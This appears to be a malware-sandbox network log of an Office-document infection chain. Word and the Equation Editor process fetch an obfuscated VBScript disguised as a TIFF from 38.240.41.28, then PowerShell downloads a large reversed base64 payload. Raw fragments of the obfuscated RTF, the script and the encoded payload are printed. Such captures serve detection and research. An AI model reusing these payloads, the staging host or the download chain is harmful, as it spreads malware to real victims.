                                                                                                                                                                                      Oct 7, 2024 07:14:33.031348944 CEST1236INData Raw: 34 21 23 40 25 23 2c 28 7c 60 3f b0 21 26 25 5e 38 37 36 29 21 3f 30 7e 2d 5f 35 5b 2f 3f 40 29 3e 3f 2d 25 35 37 3e 2f 31 38 26 37 5b 3e 3e 24 25 21 31 3f 3b 5d 2b 37 30 2d 2a 28 5b 3e 31 3f 3e 35 31 2a 7e 2e 39 31 27 2d 3f 3a 29 29 b0 28 2c 2c
                                                                                                                                                                                      Data Ascii: 4!#@%#,(|`?!&%^876)!?0~-_5[/?@)>?-%57>/18&7[>>$%!1?;]+70-*([>1?>51*~.91'-?:))(,,=;%8?21:$$'*+7._?1?]9`@05|~~@[%~?(?*=!)<%?]5%:;9@`9(^@&(75?-&?>-??)[+852%35@<$:*!?`5%3<^00!!!'?&!<@&$<??6=></.!`6!&*]?@,`!'_4]384??!>$>*(<?4>-=#@5<%`?!
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031368017 CEST1236INData Raw: 3f 5f 31 b5 60 26 3d 23 25 2e 3f 37 3e 2b 2a 26 34 23 5f 39 3a 2c 21 26 3c 3d 3f 31 2f 5e 3f 26 3f 2c 27 7e 39 a7 7c 7e 60 3f 7e 3f 25 7c 2c b0 3b 26 7c 38 23 37 3f 36 3f 27 2d 3f 7e 5b 3a 2d 3f 27 21 2d 3c 3f 29 2d 3c a7 3b 25 5e a7 21 2a 3b 3a
                                                                                                                                                                                      Data Ascii: ?_1`&=#%.?7>+*&4#_9:,!&<=?1/^?&?,'~9|~`?~?%|,;&|8#7?6?'-?~[:-?'!-<?)-<;%^!*;:'11^~(9];@!.87(8<2%`,=0;]8|?|5~#)#`?#=1+%;<%0??':%?#!??;)?[?~|432+.8?(/14@%)[>+-_?&#:?>16_$;04%/^`0?%;9|=1[6.'($*)^+?>!+<48:.?~3*?^|<;*82,6?^-=;^<
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031438112 CEST1236INData Raw: 35 b5 2d 25 5f 36 b0 5e 38 38 b0 29 26 3e 34 2a 21 39 5b 60 3b 26 5f 5f 34 2d 2b 5b a7 40 38 25 3b 32 2d 3f 2b 5d 5b a7 40 7c 5d 2f 35 5f 3f 3a 28 25 36 3f 2d 5b 3f 25 7e 2d 5d a7 3f 38 5d 7e 26 7e 36 2d 32 2b 3f 2b 3e 2d 38 5b 3f 34 23 7c 3e 25
                                                                                                                                                                                      Data Ascii: 5-%_6^88)&>4*!9[`;&__4-+[@8%;2-?+][@|]/5_?:(%6?-[?%~-]?8]~&~6-2+?+>-8[?4#|>%$%<#~^9|?6?5!|2[4364%+96'26&)64?*](`*3)1$>%?94%%|+3)4&8$%]`.!$+'.?`:?.(*^#+@?=%]':#1`/)*7=-3?+~%<<!!#(`%*'*#,9/,6!(?79!4_%*?1=/7^/#!!?<%2$+^,+*?`*_%)?/?5
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031455040 CEST1236INData Raw: 31 3e 3f 3e 3f 33 5f 32 b5 24 2c 3c 27 a7 3b 2a 25 25 a7 37 33 2f 3b 30 3f 2f 3f 33 34 33 b0 40 2f 30 40 60 36 5d 38 33 40 2c 3f 3e 3d b5 b5 3e 3f 2a 3f 3f 27 37 7e 25 60 25 7e 5e 28 2d 7c 23 25 2b 5b 38 23 60 32 60 a7 2f 3b 2b a7 3f 26 3f 2e 3f
                                                                                                                                                                                      Data Ascii: 1>?>?3_2$,<';*%%73/;0?/?343@/0@`6]83@,?>=>?*??'7~%`%~^(-|#%+[8#`2`/;+?&?.?*5]??.?=[||4.%3]*8.~.>:4(%%*9?')$;$.^%[&^<|.=(4-?!'8($!$?]5+9?$[0!`<+?1?8/,1>7].3*??'?1+??/@??%,+?8>13+,`+%)?1.4?=%*-|;[6239]($%^9-03]=|%[%1,`=01^'2*'#*
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031470060 CEST1236INData Raw: 23 24 37 3f b5 3e 2d 5b 25 a7 2f 33 3d 25 3f 37 32 b0 3f 3e 38 33 25 3f 3b 5f 3f 36 25 2b 7c 38 a7 5d 60 38 39 36 2b 29 5e 39 2d 3c b5 37 b0 60 a7 3f 2e 34 3f 39 3c 3b 25 7c 3c 5f 33 3f 2f 38 b5 b5 30 a7 34 3f 29 29 b0 40 34 34 2b 40 39 27 60 3f
                                                                                                                                                                                      Data Ascii: #$7?>-[%/3=%?72?>83%?;_?6%+|8]`896+)^9-<7`?.4?9<;%|<_3?/804?))@44+@9'`?:!~$@.)>0*&^)24$;(8:&22`;*0'.%2:[?+&;;-^3,55|*6^<'&;~?&7_/?%9?5?78;3%'`1~?4|2>((676*-?;5``[)46$1)4<&@58'?5#~%&#?@)-=35@]@+#8?5,>?,`/0*5!-?%+(?3[%6'6,?
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031537056 CEST552INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b
                                                                                                                                                                                      Data Ascii: {\object\cwkiayxucppyeanapdfshxshoesZBDYNHBQHRIUDEP781263503759cwkiayxucppyeanapdfshxshoesZBDYNHBQHRIUDEP106258588537614632403569530{\zlpehtmmzZXCYPWHOKOYHGBMAHRB
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031553984 CEST1236INData Raw: 20 09 20 09 20 09 20 09 20 20 09 20 20 20 20 20 09 20 20 09 20 09 09 09 20 20 20 20 20 20 09 09 09 09 20 09 09 09 32 65 0a 0a 0a 0a 0a 0a 0d 0a 0a 0a 0d 0d 0d 0d 0d 30 09 09 09 09 20 09 20 20 09 09 20 09 09 20 20 09 09 20 09 20 20 09 09 09 20 20
                                                                                                                                                                                      Data Ascii: 2e0 2 0000
                                                                                                                                                                                      Oct 7, 2024 07:14:33.031569004 CEST1236INData Raw: 20 09 09 09 09 09 09 09 09 20 09 09 20 09 09 09 30 30 09 20 20 09 09 09 20 20 20 20 20 09 09 09 09 09 20 09 09 20 09 20 09 20 09 20 20 09 20 20 20 20 20 09 09 20 09 20 09 20 20 20 20 09 09 09 09 09 09 20 20 20 09 20 20 20 09 20 09 09 09 20 09 20
                                                                                                                                                                                      Data Ascii: 00 00000 0
                                                                                                                                                                                      Oct 7, 2024 07:14:33.036525965 CEST1236INData Raw: 09 20 20 09 20 09 09 09 20 09 20 20 09 20 20 20 09 20 09 09 20 09 09 20 20 20 09 09 09 20 20 20 09 20 20 09 09 09 20 09 20 20 09 20 20 09 20 20 09 20 09 20 20 09 62 20 20 09 20 20 20 20 20 20 09 20 20 20 09 09 20 20 09 09 20 20 09 09 09 09 20 09
                                                                                                                                                                                      Data Ascii: b 81c3 e


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      1192.168.2.224916938.240.41.28803792C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      Oct 7, 2024 07:14:48.446644068 CEST299OUTHEAD /333/erf/sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords.doc HTTP/1.1
                                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                      Host: 38.240.41.28
                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Oct 7, 2024 07:14:49.289314032 CEST323INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:49 GMT
                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                                                                      Last-Modified: Mon, 07 Oct 2024 01:19:01 GMT
                                                                                                                                                                                      ETag: "1c07d-623d8ce48b2ee"
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Content-Length: 114813
                                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: application/msword


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      2192.168.2.224917038.240.41.28803168C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      Oct 7, 2024 07:14:49.591789007 CEST335OUTGET /333/wegivenewthingssoonsweetness.tIF HTTP/1.1
                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                      Host: 38.240.41.28
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643018961 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:50 GMT
                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                                                                      Last-Modified: Mon, 07 Oct 2024 01:16:14 GMT
                                                                                                                                                                                      ETag: "2f7f2-623d8c45fe025"
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Content-Length: 194546
                                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: image/tiff
                                                                                                                                                                                      Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 6c 00 79 00 63 00 61 00 6e 00 74 00 68 00 72 00 6f 00 70 00 69 00 61 00 28 00 65 00 6e 00 61 00 6e 00 74 00 68 00 65 00 6d 00 61 00 2c 00 20 00 70 00 72 00 65 00 73 00 73 00 75 00 72 00 6f 00 73 00 6f 00 2c 00 20 00 70 00 75 00 78 00 69 00 72 00 75 00 6d 00 2c 00 20 00 73 00 65 00 6d 00 69 00 6c 00 6f 00 75 00 72 00 6f 00 2c 00 20 00 65 00 78 00 68 00 69 00 62 00 69 00 63 00 69 00 6f 00 6e 00 69 00 73 00 6d 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 69 00 61 00 6c 00 65 00 63 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 72 00 65 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 6f 00 72 00 6d 00 61 00 74 00 74 00 65 00 64 00 54 00 65 00 78 00 74 00 [TRUNCATED]
                                                                                                                                                                                      Data Ascii: private function lycanthropia(enanthema, pressuroso, puxirum, semilouro, exhibicionismo) dim filter dim dialect dim e dim res dim formattedText dim flags flags = 0 if puxirum.ArgumentExists(NPARA_FILTER) then filter = puxirum.Argument(NPARA_FILTER) dialect = URI_WQL_DIALECT end if if puxirum.ArgumentExists(NPARA_DIALECT) then dialect = puxirum.Argument(NPARA_DIA
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643079996 CEST1236INData Raw: 00 4c 00 45 00 43 00 54 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 49 00 66 00 20 00 4c 00 43 00 61 00 73 00 65 00 28 00 64 00 69 00 61
                                                                                                                                                                                      Data Ascii: LECT) end if If LCase(dialect) = "selector" Then dialect = "http://schemas.dmtf.org/wbem/wsman/1
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643166065 CEST1236INData Raw: 00 65 00 72 00 20 00 26 00 20 00 22 00 3c 00 77 00 73 00 6d 00 61 00 6e 00 3a 00 53 00 65 00 6c 00 65 00 63 00 74 00 6f 00 72 00 20 00 4e 00 61 00 6d 00 65 00 3d 00 27 00 22 00 20 00 26 00 20 00 45 00 73 00 63 00 61 00 70 00 65 00 28 00 6e 00 61
                                                                                                                                                                                      Data Ascii: er & "<wsman:Selector Name='" & Escape(name) & "'>" & Escape(value) & "</wsman:Selector>" Next filter =
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643201113 CEST1236INData Raw: 00 2c 00 20 00 22 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 46 00 49 00 4c 00 54 00 45 00 52 00 20 00 26 00 20 00 22 00 20 00 70 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 20 00 69 00 73 00 20 00 72 00 65 00 71
                                                                                                                                                                                      Data Ascii: , "-" & NPARA_FILTER & " parameter is required for the given dialect" End If If (puxirum.ArgumentExists
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643239021 CEST1236INData Raw: 00 6d 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 52 00 45 00 54 00 55 00 52 00 4e 00 5f 00 54 00 59 00 50 00 45 00 29 00 20 00 74 00 68 00 65 00 6e 00 0d
                                                                                                                                                                                      Data Ascii: m.ArgumentExists(NPARA_RETURN_TYPE) then select case LCase(puxirum.Argument(NPARA_RETURN_TYPE)) cas
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643273115 CEST1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 66 00 6c 00 61 00 67 00 73 00 20 00 3d 00 20 00 66 00 6c 00 61 00 67 00 73 00 20 00 4f 00 52 00 20 00 65 00 6e 00 61 00 6e 00 74 00 68 00 65 00 6d 00 61 00 2e 00 45 00 6e 00 75 00 6d 00 65 00 72
                                                                                                                                                                                      Data Ascii: flags = flags OR enanthema.EnumerationFlagHierarchyShallow elseif (puxirum.ArgumentExists(NPARA_BASE_PROPS_O
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643311977 CEST1236INData Raw: 00 61 00 67 00 73 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 41 00 53 00 53
                                                                                                                                                                                      Data Ascii: ags) end if end if ASSERTERR pressuroso, exhibicionismo on error goto 0 if puxirum.Arg
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643349886 CEST1000INData Raw: 00 20 00 65 00 2e 00 52 00 65 00 61 00 64 00 49 00 74 00 65 00 6d 00 28 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                                                                                                                      Data Ascii: e.ReadItem() end if end if if Err.Number <> 0 then stdErr.WriteLine e.Error
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643412113 CEST1236INData Raw: 00 20 00 69 00 66 00 28 00 4c 00 43 00 61 00 73 00 65 00 28 00 65 00 78 00 68 00 69 00 62 00 69 00 63 00 69 00 6f 00 6e 00 69 00 73 00 6d 00 6f 00 29 00 20 00 3c 00 3e 00 20 00 56 00 41 00 4c 00 5f 00 46 00 4f 00 52 00 4d 00 41 00 54 00 5f 00 54
                                                                                                                                                                                      Data Ascii: if(LCase(exhibicionismo) <> VAL_FORMAT_TEXT) then wscript.echo "</wsman:Results>" end if
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643449068 CEST1236INData Raw: 00 4e 00 69 00 63 00 57 00 55 00 4c 00 43 00 63 00 6c 00 4b 00 22 00 0d 00 0a 00 78 00 53 00 63 00 47 00 67 00 65 00 42 00 62 00 4b 00 69 00 6b 00 4c 00 71 00 4b 00 57 00 20 00 3d 00 20 00 22 00 6c 00 68 00 4f 00 6b 00 4b 00 4b 00 57 00 70 00 47
                                                                                                                                                                                      Data Ascii: NicWULCclK"xScGgeBbKikLqKW = "lhOkKKWpGpIWGCW"kLLCWGpapRmhbKL = "ZLqzANSecOsKtKW"iiWQUALALQTuWGA = "dsNmWmWWmocdiKK
                                                                                                                                                                                      Oct 7, 2024 07:14:50.643487930 CEST1236INData Raw: 00 55 00 55 00 51 00 69 00 20 00 3d 00 20 00 22 00 73 00 71 00 55 00 66 00 70 00 4f 00 50 00 50 00 57 00 63 00 57 00 69 00 4e 00 62 00 63 00 22 00 0d 00 0a 00 4e 00 55 00 42 00 43 00 50 00 50 00 4b 00 49 00 6f 00 70 00 65 00 64 00 65 00 69 00 55
                                                                                                                                                                                      Data Ascii: UUQi = "sqUfpOPPWcWiNbc"NUBCPPKIopedeiU = "ehpWPKZWGKChzAq"UkfizcHcpvNfLLK = "AdSmUULUKWkAzeh"ujpWHGWNKjkWhQA = "
                                                                                                                                                                                      Oct 7, 2024 07:14:50.877036095 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:50 GMT
                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                                                                      Last-Modified: Mon, 07 Oct 2024 01:16:14 GMT
                                                                                                                                                                                      ETag: "2f7f2-623d8c45fe025"
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Content-Length: 194546
                                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: image/tiff
                                                                                                                                                                                      Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 6c 00 79 00 63 00 61 00 6e 00 74 00 68 00 72 00 6f 00 70 00 69 00 61 00 28 00 65 00 6e 00 61 00 6e 00 74 00 68 00 65 00 6d 00 61 00 2c 00 20 00 70 00 72 00 65 00 73 00 73 00 75 00 72 00 6f 00 73 00 6f 00 2c 00 20 00 70 00 75 00 78 00 69 00 72 00 75 00 6d 00 2c 00 20 00 73 00 65 00 6d 00 69 00 6c 00 6f 00 75 00 72 00 6f 00 2c 00 20 00 65 00 78 00 68 00 69 00 62 00 69 00 63 00 69 00 6f 00 6e 00 69 00 73 00 6d 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 69 00 61 00 6c 00 65 00 63 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 72 00 65 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 6f 00 72 00 6d 00 61 00 74 00 74 00 65 00 64 00 54 00 65 00 78 00 74 00 [TRUNCATED]
                                                                                                                                                                                      Data Ascii: private function lycanthropia(enanthema, pressuroso, puxirum, semilouro, exhibicionismo) dim filter dim dialect dim e dim res dim formattedText dim flags flags = 0 if puxirum.ArgumentExists(NPARA_FILTER) then filter = puxirum.Argument(NPARA_FILTER) dialect = URI_WQL_DIALECT end if if puxirum.ArgumentExists(NPARA_DIALECT) then dialect = puxirum.Argument(NPARA_DIA


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      3192.168.2.224917438.240.41.28801368C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      Oct 7, 2024 07:14:59.289355040 CEST76OUTGET /333/RCCRER.txt HTTP/1.1
                                                                                                                                                                                      Host: 38.240.41.28
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Oct 7, 2024 07:15:00.134068966 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Mon, 07 Oct 2024 05:14:59 GMT
                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                                                                                      Last-Modified: Mon, 07 Oct 2024 00:23:27 GMT
                                                                                                                                                                                      ETag: "112d58-623d8079a31c8"
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Content-Length: 1125720
                                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                      Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                                                                                      Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1wLAAAADAwA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                      Oct 7, 2024 07:15:00.134120941 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                      Oct 7, 2024 07:15:00.134181976 CEST1236INData Raw: 41 50 42 41 49 41 55 47 41 6e 42 51 59 41 49 48 41 76 42 41 64 41 4d 46 41 41 41 41 41 41 55 47 41 74 42 51 59 41 34 45 41 30 42 77 59 41 55 48 41 6b 42 77 62 41 49 48 41 51 42 51 41 41 41 42 41 41 42 41 41 41 41 41 41 6c 42 41 65 41 55 47 41 75
                                                                                                                                                                                      Data Ascii: APBAIAUGAnBQYAIHAvBAdAMFAAAAAAUGAtBQYA4EA0BwYAUHAkBwbAIHAQBQAAABAABAAAAAAlBAeAUGAuAgbAMHALBgQAAAAlBQbAEGAuBQZAwGApBgRAwGAhBgbAkGAnBQaAIHAPBQAAkAA6AAAAAAAAAAAAMHArBgcAEGAtBQZAQGAhBgcAQFAsBQYAcGAlBATAEAABAgKAAAAuAAZAUGA2BgcAUGAzBQZAIHAgAwcAQHAoB
                                                                                                                                                                                      Oct 7, 2024 07:15:00.134217978 CEST672INData Raw: 41 41 41 42 41 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                      Data Ascii: AAABACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQgAQJ/DAAAAAAAwGbk5SZlJ3bjNXbA4Wah1UZ4VkcvN0XAAAAAAAAAAAAAAAD1vJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAMUfqAAAAAAAAAAAAMU/j/sf7UninJ9fK3g
                                                                                                                                                                                      Oct 7, 2024 07:15:00.134254932 CEST1236INData Raw: 76 51 7a 46 52 62 5a 75 49 4a 6d 6a 2f 35 61 45 42 4a 70 41 78 63 4e 49 69 46 75 70 2b 4c 46 68 46 56 48 42 52 53 37 66 73 47 57 77 79 48 73 67 2b 75 73 47 54 2b 6a 6f 67 49 39 33 73 6a 41 72 49 49 5a 75 49 6c 7a 42 52 70 30 48 39 57 4c 53 4c 66
                                                                                                                                                                                      Data Ascii: vQzFRbZuIJmj/5aEBJpAxcNIiFup+LFhFVHBRS7fsGWwyHsg+usGT+jogI93sjArIIZuIlzBRp0H9WLSLfQcU20/9SaHBJpGxc1HxCd17oGLE7lbL9ASzK3JWhlBcboOoBMOidDDuYsFRhYuHT4x+LnCVpI+XzC8n+m3xVEpbiL4VvJaAW3LTMplDY8ZK89coe1XsOYr4KrCFQ2uCJ0wyq0WmlJ+aWGFISWNoCWGah0Wdksl7Dt
                                                                                                                                                                                      Oct 7, 2024 07:15:00.134289026 CEST1236INData Raw: 43 33 79 47 52 34 41 2b 70 30 45 57 4f 78 36 44 35 76 61 45 34 51 4d 74 63 4c 77 51 64 37 4e 39 7a 74 4b 69 4b 6b 5a 4f 77 2b 56 36 33 59 79 34 69 41 58 68 59 59 71 58 4b 58 2b 4b 67 44 48 5a 51 2f 4c 73 6d 34 4b 31 58 43 6d 4d 32 73 63 47 77 7a
                                                                                                                                                                                      Data Ascii: C3yGR4A+p0EWOx6D5vaE4QMtcLwQd7N9ztKiKkZOw+V63Yy4iAXhYYqXKX+KgDHZQ/Lsm4K1XCmM2scGwzaXBBCaU/+KhKhfK9fVwkuuNrAelMDeuGb3NrlMkStmMKn1ZzsjyibT2KmrzyaWoUvyEQ1iqOqbydEDq0NiY+mgNBVcaLXB8KrWY6ITx8ZQp7uQGoSchFAfGyZwXO0gZpsS4BFL6vKYZInBfT0B9XFMKe9gJ6vC4Wr
